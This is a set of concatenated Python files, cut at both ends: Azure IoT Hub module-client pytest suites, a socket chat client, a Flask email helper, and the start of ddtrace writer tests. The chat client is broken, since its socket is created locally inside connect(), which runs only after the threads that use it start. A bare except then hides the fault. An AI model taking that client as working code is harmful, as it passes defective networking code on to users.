pytest.param(
(True, True),
("__fake_product_info__", "__fake_product_info__"),
id=" Expected Values",
),
],
)
def test_pipeline_configuration(
self,
mocker,
client_class,
edge_local_debug_environment,
websockets,
product_info,
mock_open,
):
mocker.patch.dict(os.environ, edge_local_debug_environment)
mocker.patch("azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider")
mock_config_init = mocker.patch(
"azure.iot.device.iothub.abstract_clients.IoTHubPipelineConfig",
wraps=config.IoTHubPipelineConfig,
)
mock_iothub_pipeline_init = mocker.patch("azure.iot.device.iothub.pipeline.IoTHubPipeline")
mocker.patch("azure.iot.device.iothub.pipeline.HTTPPipeline")
kwargs = {"websockets": websockets[0], "product_info": product_info[0]}
client_class.create_from_edge_environment(**kwargs)
assert mock_config_init.call_count == 1
assert mock_config_init.call_args == mocker.call(
websockets=websockets[0], product_info=product_info[0]
)
assert mock_iothub_pipeline_init.call_args[0][1].websockets == websockets[1]
assert mock_iothub_pipeline_init.call_args[0][1].product_info == product_info[1]
@pytest.mark.it("Throws if invalid configuration option is provided")
def test_pipeline_configuration_fails_with_bad_option(
self, mocker, mock_pipeline_init, client_class, edge_local_debug_environment, mock_open
):
mocker.patch.dict(os.environ, edge_local_debug_environment)
mocker.patch("azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider")
kwargs = {"bad_option": "__fake_parameter__"}
with pytest.raises(TypeError):
client_class.create_from_edge_environment(**kwargs)
@pytest.mark.describe(
"IoTHubModuleClient (Synchronous) - .create_from_edge_environment() -- Edge Local Debug Environment"
)
class TestIoTHubModuleClientCreateFromEdgeEnvironmentWithDebugEnv(IoTHubModuleClientTestsConfig):
@pytest.fixture
def mock_open(self, mocker):
return mocker.patch.object(io, "open")
@pytest.mark.it(
"Extracts the CA certificate from the file indicated by the EdgeModuleCACertificateFile environment variable"
)
def test_read_ca_cert(self, mocker, client_class, edge_local_debug_environment, mock_open):
mock_file_handle = mock_open.return_value.__enter__.return_value
mocker.patch.dict(os.environ, edge_local_debug_environment)
client_class.create_from_edge_environment()
assert mock_open.call_count == 1
assert mock_open.call_args == mocker.call(
edge_local_debug_environment["EdgeModuleCACertificateFile"], mode="r"
)
assert mock_file_handle.read.call_count == 1
@pytest.mark.it(
"Uses Edge local debug environment variables to create a SymmetricKeyAuthenticationProvider (with CA cert)"
)
def test_auth_provider_creation(
self, mocker, client_class, edge_local_debug_environment, mock_open
):
expected_cert = mock_open.return_value.__enter__.return_value.read.return_value
mocker.patch.dict(os.environ, edge_local_debug_environment)
mock_auth_parse = mocker.patch(
"azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider"
).parse
client_class.create_from_edge_environment()
assert mock_auth_parse.call_count == 1
assert mock_auth_parse.call_args == mocker.call(
edge_local_debug_environment["EdgeHubConnectionString"]
)
assert mock_auth_parse.return_value.ca_cert == expected_cert
@pytest.mark.it(
"Only uses Edge local debug variables if no Edge container variables are present in the environment"
)
def test_auth_provider_and_pipeline_hybrid_env(
self,
mocker,
client_class,
edge_container_environment,
edge_local_debug_environment,
mock_open,
):
# This test verifies that with a hybrid environment, the auth provider will always be
# an IoTEdgeAuthenticationProvider, even if local debug variables are present
hybrid_environment = merge_dicts(edge_container_environment, edge_local_debug_environment)
mocker.patch.dict(os.environ, hybrid_environment)
mock_edge_auth_init = mocker.patch(
"azure.iot.device.iothub.auth.IoTEdgeAuthenticationProvider"
)
mock_sk_auth_parse = mocker.patch(
"azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider"
).parse
client_class.create_from_edge_environment()
assert mock_edge_auth_init.call_count == 1
assert mock_sk_auth_parse.call_count == 0 # we did NOT use SK auth
assert mock_edge_auth_init.call_args == mocker.call(
hostname=edge_container_environment["IOTEDGE_IOTHUBHOSTNAME"],
device_id=edge_container_environment["IOTEDGE_DEVICEID"],
module_id=edge_container_environment["IOTEDGE_MODULEID"],
gateway_hostname=edge_container_environment["IOTEDGE_GATEWAYHOSTNAME"],
module_generation_id=edge_container_environment["IOTEDGE_MODULEGENERATIONID"],
workload_uri=edge_container_environment["IOTEDGE_WORKLOADURI"],
api_version=edge_container_environment["IOTEDGE_APIVERSION"],
)
@pytest.mark.it(
"Uses the SymmetricKeyAuthenticationProvider to create an IoTHubPipeline and an HTTPPipeline"
)
def test_pipeline_creation(self, mocker, client_class, edge_local_debug_environment, mock_open):
mocker.patch.dict(os.environ, edge_local_debug_environment)
mock_auth = mocker.patch(
"azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider"
).parse.return_value
mock_config_init = mocker.patch(
"azure.iot.device.iothub.abstract_clients.IoTHubPipelineConfig"
)
mock_iothub_pipeline_init = mocker.patch("azure.iot.device.iothub.pipeline.IoTHubPipeline")
mock_http_pipeline_init = mocker.patch("azure.iot.device.iothub.pipeline.HTTPPipeline")
client_class.create_from_edge_environment()
assert mock_iothub_pipeline_init.call_count == 1
assert mock_iothub_pipeline_init.call_args == mocker.call(
mock_auth, mock_config_init.return_value
)
assert mock_http_pipeline_init.call_count == 1
assert mock_http_pipeline_init.call_args == mocker.call(
mock_auth, mock_config_init.return_value
)
@pytest.mark.it("Uses the IoTHubPipeline and the HTTPPipeline to instantiate the client")
def test_client_instantiation(
self, mocker, client_class, edge_local_debug_environment, mock_open
):
mocker.patch.dict(os.environ, edge_local_debug_environment)
mock_iothub_pipeline = mocker.patch(
"azure.iot.device.iothub.pipeline.IoTHubPipeline"
).return_value
mock_http_pipeline = mocker.patch(
"azure.iot.device.iothub.pipeline.HTTPPipeline"
).return_value
spy_init = mocker.spy(client_class, "__init__")
client_class.create_from_edge_environment()
assert spy_init.call_count == 1
assert spy_init.call_args == mocker.call(
mocker.ANY, mock_iothub_pipeline, mock_http_pipeline
)
@pytest.mark.it("Returns the instantiated client")
def test_returns_client(self, mocker, client_class, edge_local_debug_environment, mock_open):
mocker.patch.dict(os.environ, edge_local_debug_environment)
client = client_class.create_from_edge_environment()
assert isinstance(client, client_class)
@pytest.mark.it("Raises OSError if the environment is missing required variables")
@pytest.mark.parametrize(
"missing_env_var", ["EdgeHubConnectionString", "EdgeModuleCACertificateFile"]
)
def test_bad_environment(
self, mocker, client_class, edge_local_debug_environment, missing_env_var, mock_open
):
# Remove a variable from the fixture
del edge_local_debug_environment[missing_env_var]
mocker.patch.dict(os.environ, edge_local_debug_environment)
with pytest.raises(OSError):
client_class.create_from_edge_environment()
# TODO: If auth package was refactored to use ConnectionString class, tests from that
# class would increase the coverage here.
@pytest.mark.it(
"Raises ValueError if the connection string in the EdgeHubConnectionString environment variable is invalid"
)
@pytest.mark.parametrize(
"bad_cs",
[
pytest.param("not-a-connection-string", id="Garbage string"),
pytest.param("", id="Empty string"),
pytest.param(
"HostName=Invalid;DeviceId=Invalid;ModuleId=Invalid;SharedAccessKey=Invalid;GatewayHostName=Invalid",
id="Malformed Connection String",
marks=pytest.mark.xfail(reason="Bug in pipeline + need for auth refactor"), # TODO
),
],
)
def test_bad_connection_string(
self, mocker, client_class, edge_local_debug_environment, bad_cs, mock_open
):
edge_local_debug_environment["EdgeHubConnectionString"] = bad_cs
mocker.patch.dict(os.environ, edge_local_debug_environment)
with pytest.raises(ValueError):
client_class.create_from_edge_environment()
@pytest.mark.it(
"Raises ValueError if the filepath in the EdgeModuleCACertificateFile environment variable is invalid"
)
def test_bad_filepath(self, mocker, client_class, edge_local_debug_environment, mock_open):
# To make tests compatible with Python 2 & 3, redfine errors
try:
FileNotFoundError # noqa: F823
except NameError:
FileNotFoundError = IOError
mocker.patch.dict(os.environ, edge_local_debug_environment)
my_fnf_error = FileNotFoundError()
mock_open.side_effect = my_fnf_error
with pytest.raises(ValueError) as e_info:
client_class.create_from_edge_environment()
assert e_info.value.__cause__ is my_fnf_error
@pytest.mark.it(
"Raises ValueError if the file referenced by the filepath in the EdgeModuleCACertificateFile environment variable cannot be opened"
)
def test_bad_file_io(self, mocker, client_class, edge_local_debug_environment, mock_open):
# Raise a different error in Python 2 vs 3
if six.PY2:
error = IOError()
else:
error = OSError()
mocker.patch.dict(os.environ, edge_local_debug_environment)
mock_open.side_effect = error
with pytest.raises(ValueError) as e_info:
client_class.create_from_edge_environment()
assert e_info.value.__cause__ is error
@pytest.mark.describe(
"IoTHubModuleClient (Synchronous) - .create_from_x509_certificate() -- Configuration"
)
class TestConfigurationIoTHubModuleClientCreateFromX509Certificate(IoTHubModuleClientTestsConfig):
hostname = "durmstranginstitute.farend"
device_id = "MySnitch"
module_id = "Charms"
@pytest.mark.it("Sets all configuration options to default when no user configuration provided")
def test_pipeline_configuration_defaults(self, mocker, client_class, mock_pipeline_init, x509):
mocker.patch("azure.iot.device.iothub.auth.X509AuthenticationProvider")
mock_config_init = mocker.patch(
"azure.iot.device.iothub.abstract_clients.IoTHubPipelineConfig",
wraps=config.IoTHubPipelineConfig,
)
client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id, module_id=self.module_id
)
assert mock_config_init.call_count == 1
assert mock_config_init.call_args == mocker.call()
assert mock_pipeline_init.call_args[0][1].blob_upload is False
assert mock_pipeline_init.call_args[0][1].method_invoke is False
assert mock_pipeline_init.call_args[0][1].websockets is False
assert mock_pipeline_init.call_args[0][1].product_info == ""
@pytest.mark.it("Sets all valid configuration options to the user supplied values")
@pytest.mark.parametrize(
"websockets, product_info",
[
pytest.param((None, None), (None, None), id=" Setting to None"),
pytest.param(
(True, True),
("__fake_product_info__", "__fake_product_info__"),
id=" Expected Values",
),
],
)
def test_pipeline_configuration(
self, mocker, client_class, mock_pipeline_init, x509, websockets, product_info
):
mocker.patch("azure.iot.device.iothub.auth.X509AuthenticationProvider")
mock_config_init = mocker.patch(
"azure.iot.device.iothub.abstract_clients.IoTHubPipelineConfig",
wraps=config.IoTHubPipelineConfig,
)
kwargs = {"websockets": websockets[0], "product_info": product_info[0]}
client_class.create_from_x509_certificate(
x509=x509,
hostname=self.hostname,
device_id=self.device_id,
module_id=self.module_id,
**kwargs
)
assert mock_config_init.call_count == 1
assert mock_config_init.call_args == mocker.call(
websockets=websockets[0], product_info=product_info[0]
)
assert mock_pipeline_init.call_args[0][1].websockets == websockets[1]
assert mock_pipeline_init.call_args[0][1].product_info == product_info[1]
@pytest.mark.it("Throws if invalid configuration option is provided")
def test_pipeline_configuration_fails_with_bad_option(
self, mocker, mock_pipeline_init, client_class, x509
):
mocker.patch("azure.iot.device.iothub.auth.X509AuthenticationProvider")
kwargs = {"bad_option": "__fake_parameter__"}
with pytest.raises(TypeError):
client_class.create_from_x509_certificate(
x509=x509,
hostname=self.hostname,
device_id=self.device_id,
module_id=self.module_id,
**kwargs
)
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .create_from_x509_certificate()")
class TestIoTHubModuleClientCreateFromX509Certificate(IoTHubModuleClientTestsConfig):
hostname = "durmstranginstitute.farend"
device_id = "MySnitch"
module_id = "Charms"
@pytest.mark.it("Uses the provided arguments to create a X509AuthenticationProvider")
def test_auth_provider_creation(self, mocker, client_class, x509):
mock_auth_init = mocker.patch("azure.iot.device.iothub.auth.X509AuthenticationProvider")
client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id, module_id=self.module_id
)
assert mock_auth_init.call_count == 1
assert mock_auth_init.call_args == mocker.call(
x509=x509, hostname=self.hostname, device_id=self.device_id, module_id=self.module_id
)
@pytest.mark.it("Uses the X509AuthenticationProvider to create an IoTHubPipeline")
def test_pipeline_creation(self, mocker, client_class, x509, mock_pipeline_init):
mock_auth = mocker.patch(
"azure.iot.device.iothub.auth.X509AuthenticationProvider"
).return_value
mock_config_init = mocker.patch(
"azure.iot.device.iothub.abstract_clients.IoTHubPipelineConfig"
)
client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id, module_id=self.module_id
)
assert mock_pipeline_init.call_count == 1
assert mock_pipeline_init.call_args == mocker.call(mock_auth, mock_config_init.return_value)
@pytest.mark.it("Uses the IoTHubPipeline to instantiate the client")
def test_client_instantiation(self, mocker, client_class, x509):
mock_pipeline = mocker.patch("azure.iot.device.iothub.pipeline.IoTHubPipeline").return_value
mock_pipeline_http = mocker.patch(
"azure.iot.device.iothub.pipeline.HTTPPipeline"
).return_value
spy_init = mocker.spy(client_class, "__init__")
client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id, module_id=self.module_id
)
assert spy_init.call_count == 1
assert spy_init.call_args == mocker.call(mocker.ANY, mock_pipeline, mock_pipeline_http)
@pytest.mark.it("Returns the instantiated client")
def test_returns_client(self, mocker, client_class, x509):
client = client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id, module_id=self.module_id
)
assert isinstance(client, client_class)
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .connect()")
class TestIoTHubModuleClientConnect(IoTHubModuleClientTestsConfig, SharedClientConnectTests):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .disconnect()")
class TestIoTHubModuleClientDisconnect(IoTHubModuleClientTestsConfig, SharedClientDisconnectTests):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - EVENT: Disconnect")
class TestIoTHubModuleClientDisconnectEvent(
IoTHubModuleClientTestsConfig, SharedClientDisconnectEventTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .send_message()")
class TestIoTHubNModuleClientSendD2CMessage(
IoTHubModuleClientTestsConfig, SharedClientSendD2CMessageTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .send_message_to_output()")
class TestIoTHubModuleClientSendToOutput(IoTHubModuleClientTestsConfig, WaitsForEventCompletion):
@pytest.mark.it("Begins a 'send_output_event' pipeline operation")
def test_calls_pipeline_send_message_to_output(self, client, iothub_pipeline, message):
output_name = "some_output"
client.send_message_to_output(message, output_name)
assert iothub_pipeline.send_output_event.call_count == 1
assert iothub_pipeline.send_output_event.call_args[0][0] is message
assert message.output_name == output_name
@pytest.mark.it(
"Waits for the completion of the 'send_output_event' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, iothub_pipeline_manual_cb, message
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=iothub_pipeline_manual_cb.send_output_event
)
output_name = "some_output"
client_manual_cb.send_message_to_output(message, output_name)
@pytest.mark.it(
"Raises a client error if the `send_out_event` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
client_manual_cb,
iothub_pipeline_manual_cb,
message,
pipeline_error,
client_error,
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=iothub_pipeline_manual_cb.send_output_event,
kwargs={"error": my_pipeline_error},
)
output_name = "some_output"
with pytest.raises(client_error) as e_info:
client_manual_cb.send_message_to_output(message, output_name)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it(
"Wraps 'message' input parameter in Message object if it is not a Message object"
)
@pytest.mark.parametrize(
"message_input",
[
pytest.param("message", id="String input"),
pytest.param(222, id="Integer input"),
pytest.param(object(), id="Object input"),
pytest.param(None, id="None input"),
pytest.param([1, "str"], id="List input"),
pytest.param({"a": 2}, id="Dictionary input"),
],
)
def test_send_message_to_output_calls_pipeline_wraps_data_in_message(
self, client, iothub_pipeline, message_input
):
output_name = "some_output"
client.send_message_to_output(message_input, output_name)
assert iothub_pipeline.send_output_event.call_count == 1
sent_message = iothub_pipeline.send_output_event.call_args[0][0]
assert isinstance(sent_message, Message)
assert sent_message.data == message_input
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .receive_message_on_input()")
class TestIoTHubModuleClientReceiveInputMessage(IoTHubModuleClientTestsConfig):
@pytest.mark.it("Implicitly enables input messaging feature if not already enabled")
def test_enables_input_messaging_only_if_not_already_enabled(
self, mocker, client, iothub_pipeline
):
mocker.patch.object(
SyncClientInbox, "get"
) # patch this receive_message_on_input won't block
input_name = "some_input"
# Verify Input Messaging enabled if not enabled
iothub_pipeline.feature_enabled.__getitem__.return_value = (
False
) # Input Messages will appear disabled
client.receive_message_on_input(input_name)
assert iothub_pipeline.enable_feature.call_count == 1
assert iothub_pipeline.enable_feature.call_args[0][0] == constant.INPUT_MSG
iothub_pipeline.enable_feature.reset_mock()
# Verify Input Messaging not enabled if already enabled
iothub_pipeline.feature_enabled.__getitem__.return_value = (
True
) # Input Messages will appear enabled
client.receive_message_on_input(input_name)
assert iothub_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Returns a message from the input inbox, if available")
def test_returns_message_from_input_inbox(self, mocker, client, message):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = message
manager_get_inbox_mock = mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
input_name = "some_input"
received_message = client.receive_message_on_input(input_name)
assert manager_get_inbox_mock.call_count == 1
assert manager_get_inbox_mock.call_args == mocker.call(input_name)
assert inbox_mock.get.call_count == 1
assert received_message is message
@pytest.mark.it("Can be called in various modes")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_can_be_called_in_mode(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
input_name = "some_input"
client.receive_message_on_input(input_name, block=block, timeout=timeout)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=block, timeout=timeout)
@pytest.mark.it("Defaults to blocking mode with no timeout")
def test_default_mode(self, mocker, client):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
input_name = "some_input"
client.receive_message_on_input(input_name)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=True, timeout=None)
@pytest.mark.it("Blocks until a message is available, in blocking mode")
def test_no_message_in_inbox_blocking_mode(self, client, message):
input_name = "some_input"
input_inbox = client._inbox_manager.get_input_message_inbox(input_name)
assert input_inbox.empty()
def insert_item_after_delay():
time.sleep(0.01)
input_inbox._put(message)
insertion_thread = threading.Thread(target=insert_item_after_delay)
insertion_thread.start()
received_message = client.receive_message_on_input(input_name, block=True)
assert received_message is message
# This proves that the blocking happens because 'received_message' can't be
# 'message' until after a 10 millisecond delay on the insert. But because the
# 'received_message' IS 'message', it means that client.receive_message_on_input
# did not return until after the delay.
@pytest.mark.it(
"Returns None after a timeout while blocking, in blocking mode with a specified timeout"
)
def test_times_out_waiting_for_message_blocking_mode(self, client):
input_name = "some_input"
result = client.receive_message_on_input(input_name, block=True, timeout=0.01)
assert result is None
@pytest.mark.it("Returns None immediately if there are no messages, in nonblocking mode")
def test_no_message_in_inbox_nonblocking_mode(self, client):
input_name = "some_input"
result = client.receive_message_on_input(input_name, block=False)
assert result is None
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .receive_method_request()")
class TestIoTHubModuleClientReceiveMethodRequest(
IoTHubModuleClientTestsConfig, SharedClientReceiveMethodRequestTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .send_method_response()")
class TestIoTHubModuleClientSendMethodResponse(
IoTHubModuleClientTestsConfig, SharedClientSendMethodResponseTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .get_twin()")
class TestIoTHubModuleClientGetTwin(IoTHubModuleClientTestsConfig, SharedClientGetTwinTests):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .patch_twin_reported_properties()")
class TestIoTHubModuleClientPatchTwinReportedProperties(
IoTHubModuleClientTestsConfig, SharedClientPatchTwinReportedPropertiesTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .receive_twin_desired_properties_patch()")
class TestIoTHubModuleClientReceiveTwinDesiredPropertiesPatch(
IoTHubModuleClientTestsConfig, SharedClientReceiveTwinDesiredPropertiesPatchTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .invoke_method()")
class TestIoTHubModuleClientInvokeMethod(WaitsForEventCompletion, IoTHubModuleClientTestsConfig):
@pytest.mark.it("Begins a 'invoke_method' HTTPPipeline operation where the target is a device")
def test_calls_pipeline_invoke_method_for_device(self, client, http_pipeline):
method_params = "__fake_method_params__"
device_id = "__fake_device_id__"
client.invoke_method(method_params, device_id)
assert http_pipeline.invoke_method.call_count == 1
assert http_pipeline.invoke_method.call_args[0][0] is device_id
assert http_pipeline.invoke_method.call_args[0][1] is method_params
@pytest.mark.it("Begins a 'invoke_method' HTTPPipeline operation where the target is a module")
def test_calls_pipeline_invoke_method_for_module(self, client, http_pipeline):
method_params = "__fake_method_params__"
device_id = "__fake_device_id__"
module_id = "__fake_module_id__"
client.invoke_method(method_params, device_id, module_id=module_id)
assert http_pipeline.invoke_method.call_count == 1
assert http_pipeline.invoke_method.call_args[0][0] is device_id
assert http_pipeline.invoke_method.call_args[0][1] is method_params
assert http_pipeline.invoke_method.call_args[1]["module_id"] is module_id
@pytest.mark.it(
"Waits for the completion of the 'invoke_method' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, http_pipeline_manual_cb
):
method_params = "__fake_method_params__"
device_id = "__fake_device_id__"
module_id = "__fake_module_id__"
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.invoke_method,
kwargs={"invoke_method_response": "__fake_invoke_method_response__"},
)
client_manual_cb.invoke_method(method_params, device_id, module_id=module_id)
@pytest.mark.it(
"Raises a client error if the `invoke_method` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, http_pipeline_manual_cb, pipeline_error, client_error
):
method_params = "__fake_method_params__"
device_id = "__fake_device_id__"
module_id = "__fake_module_id__"
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.invoke_method,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.invoke_method(method_params, device_id, module_id=module_id)
assert e_info.value.__cause__ is my_pipeline_error
####################
# HELPER FUNCTIONS #
####################
def merge_dicts(d1, d2):
d3 = d1.copy()
d3.update(d2)
return d3
|
client.py
|
import socket
import threading
import threading
from time import sleep
import datetime as dt
HOST = '127.0.0.1' # Use Server IP
PORT = 8000 # Use Server Port
HEADERLEN = 10
name = input("Enter nickname: ")
print(f'Connecting to {HOST}:{PORT}...\n')
# Connecting To Server
def connect():
clnt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
clnt.connect((HOST, PORT))
def getMsg(skt):
full_msg = ''
new = True
while True:
msg = skt.recv(HEADERLEN)
if new:
msglen = int(msg)
new = False
if len(msg) == 0:
break
full_msg += msg.decode()
if len(full_msg)-HEADERLEN == msglen:
return full_msg[HEADERLEN:] # returns DECODED message
def sendMsg(clnt, msg):
msg = f'{len(msg):<{HEADERLEN}}' + msg
msg = msg.encode()
clnt.send(msg) # sends ENCODED message
def receive():
while True:
try:
msg = getMsg(clnt)
if msg == 'name':
sendMsg(clnt, name)
else:
x = dt.datetime.now()
time = x.strftime(f"%H:%M:%S")
date = x.strftime("%d/%m/%Y") #Soon
print(f"{time} >> {msg}")
except:
print(f"\nError, Possible Server Down.")
sleep(2)
def write():
while True:
msg = '{}: {}'.format(name, input())
sendMsg(clnt, msg)
recv_thread = threading.Thread(target=receive)
recv_thread.start()
write_thread = threading.Thread(target=write)
write_thread.start()
connect()
|
email.py
|
"""
-------------------------------------------------
Project Name: LearnFlask
File Name: email
Author: cjiang
Date: 2020/5/21 6:59 PM
-------------------------------------------------
"""
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_mail(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX']+subject,
sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
|
test_writer.py
|
import os
import socket
import tempfile
import threading
import time
import mock
import msgpack
import pytest
from six.moves import BaseHTTPServer
from six.moves import socketserver
from ddtrace.constants import KEEP_SPANS_RATE_KEY
from ddtrace.internal.compat import PY3
from ddtrace.internal.compat import get_connection_response
from ddtrace.internal.compat import httplib
from ddtrace.internal.encoding import MSGPACK_ENCODERS
from ddtrace.internal.uds import UDSHTTPConnection
from ddtrace.internal.writer import AgentWriter
from ddtrace.internal.writer import LogWriter
from ddtrace.internal.writer import Response
from ddtrace.internal.writer import _human_size
from ddtrace.span import Span
from tests.utils import AnyInt
from tests.utils import BaseTestCase
from tests.utils import override_env
class DummyOutput:
def __init__(self):
self.entries = []
def write(self, message):
self.entries.append(message)
def flush(self):
pass
class AgentWriterTests(BaseTestCase):
N_TRACES = 11
def test_metrics_disabled(self):
statsd = mock.Mock()
writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=False)
for i in range(10):
writer.write([Span(name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)])
writer.stop()
writer.join()
statsd.increment.assert_not_called()
statsd.distribution.assert_not_called()
def test_metrics_bad_endpoint(self):
statsd = mock.Mock()
writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=True)
for i in range(10):
writer.write([Span(name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)])
writer.stop()
writer.join()
statsd.distribution.assert_has_calls(
[
mock.call("datadog.tracer.buffer.accepted.traces", 10, tags=[]),
mock.call("datadog.tracer.buffer.accepted.spans", 50, tags=[]),
mock.call("datadog.tracer.http.requests", writer.RETRY_ATTEMPTS, tags=[]),
mock.call("datadog.tracer.http.errors", 1, tags=["type:err"]),
mock.call("datadog.tracer.http.dropped.bytes", AnyInt(), tags=[]),
],
any_order=True,
)
def test_metrics_trace_too_big(self):
statsd = mock.Mock()
writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=True)
for i in range(10):
writer.write([Span(name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)])
writer.write([Span(name="a" * 5000, trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(2 ** 10)])
writer.stop()
writer.join()
statsd.distribution.assert_has_calls(
[
mock.call("datadog.tracer.buffer.accepted.traces", 10, tags=[]),
mock.call("datadog.tracer.buffer.accepted.spans", 50, tags=[]),
mock.call("datadog.tracer.buffer.dropped.traces", 1, tags=["reason:t_too_big"]),
mock.call("datadog.tracer.buffer.dropped.bytes", AnyInt(), tags=["reason:t_too_big"]),
mock.call("datadog.tracer.http.requests", writer.RETRY_ATTEMPTS, tags=[]),
mock.call("datadog.tracer.http.errors", 1, tags=["type:err"]),
mock.call("datadog.tracer.http.dropped.bytes", AnyInt(), tags=[]),
],
any_order=True,
)
def test_metrics_multi(self):
statsd = mock.Mock()
writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=True)
for i in range(10):
writer.write([Span(name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)])
writer.flush_queue()
statsd.distribution.assert_has_calls(
[
mock.call("datadog.tracer.buffer.accepted.traces", 10, tags=[]),
mock.call("datadog.tracer.buffer.accepted.spans", 50, tags=[]),
mock.call("datadog.tracer.http.requests", writer.RETRY_ATTEMPTS, tags=[]),
mock.call("datadog.tracer.http.errors", 1, tags=["type:err"]),
mock.call("datadog.tracer.http.dropped.bytes", AnyInt(), tags=[]),
],
any_order=True,
)
statsd.reset_mock()
for i in range(10):
writer.write([Span(name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)])
writer.stop()
writer.join()
statsd.distribution.assert_has_calls(
[
mock.call("datadog.tracer.buffer.accepted.traces", 10, tags=[]),
mock.call("datadog.tracer.buffer.accepted.spans", 50, tags=[]),
mock.call("datadog.tracer.http.requests", writer.RETRY_ATTEMPTS, tags=[]),
mock.call("datadog.tracer.http.errors", 1, tags=["type:err"]),
mock.call("datadog.tracer.http.dropped.bytes", AnyInt(), tags=[]),
],
any_order=True,
)
def test_write_sync(self):
statsd = mock.Mock()
writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=True, sync_mode=True)
writer.write([Span(name="name", trace_id=1, span_id=j, parent_id=j - 1 or None) for j in range(5)])
statsd.distribution.assert_has_calls(
[
mock.call("datadog.tracer.buffer.accepted.traces", 1, tags=[]),
mock.call("datadog.tracer.buffer.accepted.spans", 5, tags=[]),
mock.call("datadog.tracer.http.requests", writer.RETRY_ATTEMPTS, tags=[]),
